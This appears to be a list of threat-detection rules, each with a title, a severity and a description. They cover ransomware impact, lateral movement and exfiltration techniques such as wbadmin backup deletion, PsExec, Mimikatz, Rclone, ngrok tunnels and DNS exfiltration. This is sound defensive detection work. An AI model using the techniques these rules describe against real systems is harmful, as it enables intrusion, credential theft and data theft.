All Backups Deleted Via Wbadmin.EXE | high | Detects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.
Windows Backup Deleted Via Wbadmin.EXE | medium | Detects the deletion of backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.
File Recovery From Backup Via Wbadmin.EXE | medium | Detects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
Potentially Suspicious Desktop Background Change Via Registry | medium | Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Registry Disable System Restore | high | Detects the modification of the registry to disable System Restore on the computer.
New Root or CA or AuthRoot Certificate to Store | medium | Detects the addition of new root, CA or AuthRoot certificates to the Windows registry.
Potential Ransomware Activity Using LegalNotice Message | high | Detects changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages.
WannaCry Ransomware Activity | critical | Detects WannaCry ransomware activity.
Potential Dtrack RAT ActivitycriticalDetects potential Dtrack RAT activity via specific process patterns
LockerGoga Ransomware ActivitycriticalDetects LockerGoga ransomware activity via specific command line.
Potential Maze Ransomware ActivitycriticalDetects specific process characteristics of Maze ransomware word document droppers
Potential BlackByte Ransomware ActivityhighDetects command line patterns used by BlackByte ransomware in different operations
Potential Conti Ransomware ActivitycriticalDetects a specific command used by the Conti ransomware group
BlueSky Ransomware ArtefactshighDetect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.
CVE-2024-49113 Exploitation Attempt - LDAP NightmarehighDetects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
Amsi.DLL Load By Uncommon ProcesslowDetects loading of Amsi.dll by uncommon processes
Process Terminated Via TaskkilllowDetects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
Multiple Modsecurity BlocksmediumDetects multiple blocks by the mod_security module (Web Application Firewall)
Suspicious Multiple File Rename Or Delete OccurredmediumDetects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).
attack.lateral_movement 151
Title | Level | Description
Suspicious Epmap Connection | high | Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC)
PsExec Pipes Artifacts | medium | Detects use of PsExec via pipe creation/access to pipes
DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon | critical | Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.
Lateral Movement Indicator ConDrv | low | This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context.
OpenCanary - SMB File Open Request | high | Detects instances where an SMB service on an OpenCanary node has had a file open request.
OpenCanary - SNMP OID Request | high | Detects instances where an SNMP service on an OpenCanary node has had an OID request.
OpenCanary - SSH Login Attempt | high | Detects instances where an SSH service on an OpenCanary node has had a login attempt.
OpenCanary - SSH New Connection Attempt | high | Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
OpenCanary - VNC Connection Attempt | high | Detects instances where a VNC service on an OpenCanary node has had a connection attempt.
Remote Schedule Task Lateral Movement via ATSvc | high | Detects remote RPC calls to create or execute a scheduled task via ATSvc
Remote Encrypting File System Abuse | high | Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
Remote Schedule Task Lateral Movement via ITaskSchedulerService | high | Detects remote RPC calls to create or execute a scheduled task
Remote Printing Abuse for Lateral Movement | high | Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR
Remote DCOM/WMI Lateral Movement | high | Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
Remote Registry Lateral Movement | high | Detects remote RPC calls to modify the registry and possibly execute code
Remote Server Service Abuse | high | Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS
Remote Server Service Abuse for Lateral Movement | high | Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
Remote Schedule Task Lateral Movement via SASec | high | Detects remote RPC calls to create or execute a scheduled task via SASec
AWS Console GetSigninToken Potential Abuse | medium | Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.
AWS STS AssumeRole Misuse | low | Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
AWS STS GetSessionToken Misuse | low | Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
AWS Suspicious SAML Activity | medium | Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
Bitbucket Global SSH Settings Changed | medium | Detects Bitbucket global SSH access configuration changes.
Remote File Copy | low | Detects the use of tools that copy files from or to remote systems
Cisco Stage Data | low | Various protocols may be used to put data on the device for exfil or infil
SMB Spoolss Name Piped Usage | medium | Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
OMIGOD HTTP No Authentication RCE | high | Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote code execution (RCE) of commands as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Publicly Accessible RDP Service | high | Detects connections from routable IPs to an RDP listener, which is indicative of a publicly-accessible RDP service.
Remote Task Creation via ATSVC Named Pipe - Zeek | medium | Detects remote task creation via at.exe or API interacting with ATSVC named pipe
First Time Seen Remote Named Pipe - Zeek | high | This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes
Suspicious PsExec Execution - Zeek | high | Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if an attacker uses a PsExec client other than the Sysinternals one
Apache Threading Error | medium | Detects an issue in Apache logs that reports threading related errors
Mimikatz Use | high | This method detects Mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz versions that are however still used by different threat groups)
Audit CVE Event | critical | Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
NTLM Logon | low | Detects logons using NTLM, which could be caused by a legacy source or attackers
OpenSSH Server Listening On Socket | medium | Detects scenarios where an attacker enables the OpenSSH server and the server starts listening on the SSH socket.
Access To ADMIN$ Network Share | low | Detects access to ADMIN$ network share
Remote Task Creation via ATSVC Named Pipe | medium | Detects remote task creation via at.exe or API interacting with ATSVC named pipe
CobaltStrike Service Installations - Security | high | Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
DCERPC SMB Spoolss Named Pipe | medium | Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
DCOM InternetExplorer.Application Iertutil DLL Hijack - Security | high | Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.
External Disk Drive Or USB Storage Device Was Recognized By The System | low | Detects external disk drives or plugged-in USB devices.
Persistence and Execution at Scale via GPO Scheduled Task | high | Detects lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
Impacket PsExec Execution | high | Detects execution of Impacket's psexec.py.
First Time Seen Remote Named Pipe | high | This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes
Metasploit SMB Authentication | high | Alerts on Metasploit host's authentications on the domain.
Metasploit Or Impacket Service Installation Via SMB PsExec | high | Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
Denied Access To Remote Desktop | medium | This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available Windows servers in the network.
Protected Storage Service Access | high | Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
RDP over Reverse SSH Tunnel WFP | high | Detects svchost hosting RDP termsvcs communicating with the loopback address
Register new Logon Process by Rubeus | high | Detects potential use of Rubeus via a newly registered trusted logon process
SMB Create Remote File Admin Share | high | Looks for non-system accounts accessing a file over SMB with write (0x2) access mask via an administrative share (i.e. C$).
Suspicious Remote Logon with Explicit Credentials | medium | Detects suspicious processes logging on with explicit credentials
Uncommon Outbound Kerberos Connection - Security | medium | Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
Suspicious PsExec Execution | high | Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if an attacker uses a PsExec client other than the Sysinternals one
Remote Service Activity via SVCCTL Named Pipe | medium | Detects remote service activity via remote access to the svcctl named pipe
User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' | high | The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possibly Rubeus trying to get a handle to LSA.
T1047 Wmiprvse Wbemcomn DLL Hijack | high | Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario.
Admin User Remote Logon | low | Detects remote login by Administrator user (depending on internal pattern).
RDP Login from Localhost | high | RDP login with localhost source address may be a tunnelled login
Successful Overpass the Hash Attempt | high | Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g. Mimikatz's sekurlsa::pth module.
Scanner PoC for CVE-2019-0708 RDP RCE Vuln | high | Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
Pass the Hash Activity 2 | medium | Detects the attack technique pass the hash which is used to move laterally inside the network
Outgoing Logon with New Credentials | low | Detects logon events that specify new credentials
NTLMv1 Logon Between Client and Server | medium | Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.
Zerologon Exploitation Using Well-known Tools | critical | This rule is designed to detect attempts to exploit the Zerologon (CVE-2020-1472) vulnerability using the mimikatz zerologon module or other exploits from a machine with "kali" hostname.
CobaltStrike Service Installations - System | critical | Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
smbexec.py Service Installation | high | Detects the use of the smbexec.py tool by detecting a specific service installation
Potential RDP Exploit CVE-2019-0708 | medium | Detects a suspicious error on the RDP protocol, potential CVE-2019-0708
PSExec and WMI Process Creations Block | high | Detects blocking of process creations originating from PSExec and WMI commands
Potential DCOM InternetExplorer.Application DLL Hijack | critical | Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
PSEXEC Remote Execution File Artefact | high | Detects creation of the PSEXEC key file, which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Wmiexec Default Output File | critical | Detects the creation of the default output filename used by the wmiexec tool
Wmiprvse Wbemcomn DLL Hijack - File | critical | Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Writing Local Admin Share | medium | Adversaries may interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load | critical | Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load | medium | Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicate WMI ActiveScriptEventConsumers EventConsumers activity.
Wmiprvse Wbemcomn DLL Hijack | high | Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Suspicious WSMAN Provider Image Loads | medium | Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
Outbound RDP Connections Over Non-Standard Tools | high | Detects non-standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this rule to exclude third party RDP tooling that you might use.
RDP Over Reverse SSH Tunnel | high | Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
RDP to HTTP or HTTPS Target Ports | high | Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
Uncommon Outbound Kerberos Connection | medium | Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
Potential Remote PowerShell Session Initiated | high | Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicate a remote PowerShell connection.
PUA - CSExec Default Named Pipe | medium | Detects default CSExec pipe creation
PUA - RemCom Default Named Pipe | medium | Detects default RemCom pipe creation
Remote PowerShell Session (PS Classic) | low | Detects remote PowerShell sessions
Suspicious Non PowerShell WSMAN COM Provider | medium | Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
HackTool - Evil-WinRm Execution - PowerShell Module | high | Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.
Remote PowerShell Session (PS Module) | high | Detects remote PowerShell sessions
Enable Windows Remote Management | medium | Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
HackTool - Rubeus Execution - ScriptBlock | high | Detects the execution of the hacktool Rubeus using specific command line flags
Execute Invoke-command on Remote Host | medium | Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
Suspicious New-PSDrive to Admin Share | medium | Adversaries may interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
Remote LSASS Process Access Through Windows Remote Management | high | Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
HackTool - WinRM Access Via Evil-WinRM | medium | Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
HackTool - Potential Impacket Lateral Movement Activity | high | Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework
HackTool - KrbRelayUp Execution | high | Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
HackTool - Rubeus Execution | critical | Detects the execution of the hacktool Rubeus via PE information of command line parameters
HackTool - SharpMove Tool Execution | high | Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
HackTool - SharpWSUS/WSUSpendu Execution | high | Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
HackTool - Wmiexec Default Powershell Command | high | Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
Suspicious SysAidServer Child | medium | Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
MMC Spawning Windows Shell | high | Detects a Windows command line executable started from MMC
Potential MSTSC Shadowing Activity | high | Detects RDP session hijacking by using MSTSC shadowing
New Remote Desktop Connection Initiated Via Mstsc.EXE | medium | Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Mstsc.EXE Execution From Uncommon Parent | high | Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
New Port Forwarding Rule Added Via Netsh.EXE | medium | Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
RDP Port Forwarding Rule Added Via Netsh.EXE | high | Detects the execution of netsh to configure a port forwarding rule for port 3389 (RDP)
Windows Admin Share Mount Via Net.EXE | medium | Detects when an admin share is mounted using net.exe
Password Provided In Command Line Of Net.EXE | medium | Detects when net.exe is called with a password in the command line
Windows Internet Hosted WebDav Share Mount Via Net.EXE | high | Detects when an internet hosted WebDav share is mounted using the "net.exe" utility
Windows Share Mount Via Net.EXE | low | Detects when a share is mounted using the "net.exe" utility
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp | high | Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
PDQ Deploy Remote Administration Tool Execution | medium | Detects use of the PDQ Deploy remote admin tool
Suspicious Plink Port Forwarding | high | Detects suspicious Plink tunnel port forwarding to a local port
PUA - Radmin Viewer Utility Execution | medium | Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
Potential Tampering With RDP Related Registry Keys Via Reg.EXE | high | Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
Rundll32 Execution Without Parameters | high | Detects rundll32 execution without parameters as observed when running the Metasploit windows/smb/psexec exploit module
Port Forwarding Activity Via SSH.EXE | medium | Detects port forwarding activity via SSH.exe
User Added to Remote Desktop Users Group | high | Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
Copy From Or To Admin Share Or Sysvol Folder | medium | Detects a copy command or a copy utility execution to or from an Admin share or remote
Privilege Escalation via Named Pipe Impersonation | high | Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
Potential Remote Desktop Tunneling | medium | Detects potential use of an SSH utility to establish RDP over a reverse SSH tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
Terminal Service Process Spawn | high | Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
Suspicious RDP Redirect Using TSCON | high | Detects a suspicious RDP session redirect using tscon.exe
Suspicious UltraVNC Execution | high | Detects suspicious UltraVNC command line flag combinations that indicate an auto reconnect upon execution, e.g. startup (as seen being used by the Gamaredon threat group)
Potential Persistence Via Logon Scripts - Registry | medium | Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
New PortProxy Registry Entry Added | medium | Detects the modification of the PortProxy registry key which is used for port forwarding.
Potential CobaltStrike Service Installations - Registry | high | Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement.
Turla Group Lateral Movement | critical | Detects automated lateral movement by Turla group
WannaCry Ransomware Activity | critical | Detects WannaCry ransomware activity
APT31 Judgement Panda Activity | critical | Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC | high | Detects the execution of the commonly used ZeroLogon PoC executable.
Possible Exploitation of Exchange RCE CVE-2021-42321 | high | Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321
Hermetic Wiper TG Process Patterns | high | Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
Potential CVE-2023-46214 Exploitation Attempt | medium | Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
Exploitation Attempt Of CVE-2023-46214 Using Public POC Code | high | Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing, using known public proof of concept code
User with Privileges Logon | low | Detects logons with "Special groups" and "Special Privileges", which can be thought of as Administrator groups or privileges.
Potential Pass the Hash Activity | medium | Detects the attack technique pass the hash which is used to move laterally inside the network
Interactive Logon to Server Systems | medium | Detects interactive console logons to Server Systems
New RDP Connection Initiated From Domain Controller | high | Detects an RDP connection originating from a domain controller.
Potential Remote WMI ActiveScriptEventConsumers Activity | medium | Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
SMB over QUIC Via PowerShell Script | medium | Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
Net.EXE Execution | low | Detects execution of "Net.EXE".
SMB over QUIC Via Net.EXE | medium | Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
Mimikatz In-Memory | medium | Detects certain DLL loads when Mimikatz gets executed
Automated Turla Group Lateral Movement | medium | Detects automated lateral movement by Turla group
Metasploit Or Impacket Service Installation Via SMB PsExec | high | Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
Remote Schtasks Creation | medium | Detects remote execution via scheduled task creation or update on the destination host
Failed Mounting of Hidden Share | medium | Detects repeated failed (outgoing) attempts to mount a hidden share
attack.exfiltration 92
Title | Level | Description
Microsoft Binary Github CommunicationhighDetects an executable in the Windows folder accessing github.com
Dnscat ExecutioncriticalDnscat exfiltration tool execution
Suspicious Bitstransfer via PowerShellmediumDetects transferring files from system on a server bitstransfer Powershell cmdlets
RClone ExecutionhighDetects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
Rclone Execution via Command Line or PowerShellhighDetects Rclone which is commonly used by ransomware groups for exfiltration
OpenCanary - FTP Login AttempthighDetects instances where an FTP service on an OpenCanary node has had a login attempt.
OpenCanary - TFTP RequesthighDetects instances where a TFTP service on an OpenCanary node has had a request.
Suspicious SQL QuerymediumDetects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
AWS EC2 VM Export FailurelowAn attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
AWS RDS Master Password ChangemediumDetects the change of database master password. It may be a part of data exfiltration.
Modification or Deletion of an AWS RDS ClusterhighDetects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.
Restore Public AWS RDS InstancehighDetects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.
AWS S3 Data Management TamperinglowDetects when a user tampers with S3 data management in Amazon Web Services.
AWS Snapshot Backup ExfiltrationmediumDetects the modification of an EC2 snapshot's permissions to enable access from another account
Data Exfiltration to Unsanctioned AppsmediumDetects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.
Suspicious Inbox ForwardinglowDetects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.
Suspicious OAuth App File Download ActivitiesmediumDetects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.
Data CompressedlowAn adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Data Exfiltration with WgetmediumDetects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
Split A File Into Pieces - LinuxlowDetection use of the command "split" to split files into parts and possible transfer.
Communication To Ngrok Tunneling Service - LinuxhighDetects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Suspicious Curl File Upload - LinuxmediumDetects a suspicious curl process start the adds a file to a web request
Disk Image Creation Via Hdiutil - MacOSmediumDetects the execution of the hdiutil utility in order to create a disk image.
Split A File Into PieceslowDetection use of the command "split" to split files into parts and possible transfer.
Cisco Stage DatalowVarious protocols maybe used to put data on the device for exfil or infil
Monero Crypto Coin Mining Pool LookuphighDetects suspicious DNS queries to Monero mining pools
Suspicious DNS Query with B64 Encoded StringmediumDetects suspicious DNS queries using base64 encoding
DNS TOR ProxiesmediumIdentifies IPs performing DNS lookups associated with common Tor proxies.
WebDav Put RequestlowA general detection for the WebDAV user agent being used to PUT files on a WebDAV network share. This could be an indicator of exfiltration.
Rclone Activity via ProxymediumDetects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
Suspicious Windows Strings In URIhighDetects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication
DNS Query for Anonfiles.com Domain - DNS ClienthighDetects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes
DNS Query To MEGA Hosting Website - DNS ClientmediumDetects DNS queries for subdomains related to MEGA sharing website
DNS Query To Ufile.io - DNS ClientlowDetects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
Tap Driver Installation - SecuritylowDetects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.
Tap Driver InstallationmediumWell-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
DNS Query for Anonfiles.com Domain - SysmonhighDetects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes
DNS Query To MEGA Hosting WebsitemediumDetects DNS queries for subdomains related to MEGA sharing website
DNS Query To Ufile.iolowDetects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
Rclone Config File CreationmediumDetects Rclone config files being created
Network Connection Initiated To BTunnels DomainsmediumDetects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Network Connection Initiated To Cloudflared Tunnels DomainsmediumDetects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Network Connection Initiated To DevTunnels DomainmediumDetects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Network Connection Initiated To Mega.nzlowDetects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
Process Initiated Network Connection To Ngrok DomainhighDetects an executable initiating a network connection to "ngrok" domains. Attackers have been seen using ngrok to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of data exfiltration by malicious actors or of an additional download.
Communication To Ngrok Tunneling Service InitiatedhighDetects an executable initiating a network connection to "ngrok" tunneling domains. Attackers have been seen using ngrok to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of data exfiltration by malicious actors or of an additional download.
Network Communication Initiated To Portmap.IO DomainmediumDetects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
Network Connection Initiated To Visual Studio Code Tunnels DomainmediumDetects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Suspicious Outbound SMTP ConnectionsmediumAdversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Potential Data Exfiltration Via Audio FilemediumDetects potential exfiltration attempt via audio file using PowerShell
Suspicious PowerShell Mailbox SMTP Forward RulemediumDetects usage of the PowerShell Set-Mailbox cmdlet to set up an SMTP forwarding rule.
PowerShell ICMP ExfiltrationmediumDetects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
Powershell DNSExfiltrationhighDetects use of DNSExfiltrator, which transfers (exfiltrates) a file over a DNS request covert channel.
Suspicious PowerShell Mailbox Export to Share - PScriticalDetects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation.
PowerShell Script With File Hostname Resolving CapabilitiesmediumDetects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.
PowerShell Script With File Upload CapabilitieslowDetects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method.
Arbitrary File Download Via ConfigSecurityPolicy.EXEmediumDetects the execution of "ConfigSecurityPolicy.EXE", a binary that is part of Windows Defender and is used to manage its settings (users can configure different pilot collections for each of the co-management workloads). Attackers can abuse it to upload or download files.
Active Directory Structure Export Via Csvde.EXEmediumDetects the execution of "csvde.exe" in order to export organizational Active Directory structure.
DNS Exfiltration and Tunneling Tools ExecutionhighWell-known DNS Exfiltration tools execution
Active Directory Structure Export Via Ldifde.EXEmediumDetects the execution of "ldifde.exe" in order to export organizational Active Directory structure.
LOLBAS Data Exfiltration by DataSvcUtil.exemediumDetects when a user performs data exfiltration by using DataSvcUtil.exe
Email Exifiltration Via PowershellhighDetects email exfiltration via PowerShell cmdlets.
Suspicious PowerShell Mailbox Export to SharecriticalDetects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation.
PUA - Rclone ExecutionhighDetects execution of the RClone utility for exfiltration, as used by various ransomware strains such as REvil, Conti and FiveHands.
Exports Critical Registry Keys To a FilehighDetects the export of a critical Registry key to a file.
Exports Registry Key To a FilelowDetects the export of the target Registry key to a file.
Suspicious WebDav Client Execution Via Rundll32.EXEhighDetects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
WebDav Client Execution Via Rundll32.EXEmediumDetects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
Copy From Or To Admin Share Or Sysvol FoldermediumDetects a copy command or copy utility execution to or from an admin share or a remote SYSVOL folder.
Suspicious Redirection to Local Admin SharehighDetects suspicious output redirection to the local admin share; this technique is often found in malicious scripts or hacktool stagers.
Tap Installer ExecutionmediumWell-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
Compressed File Creation Via Tar.EXElowDetects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
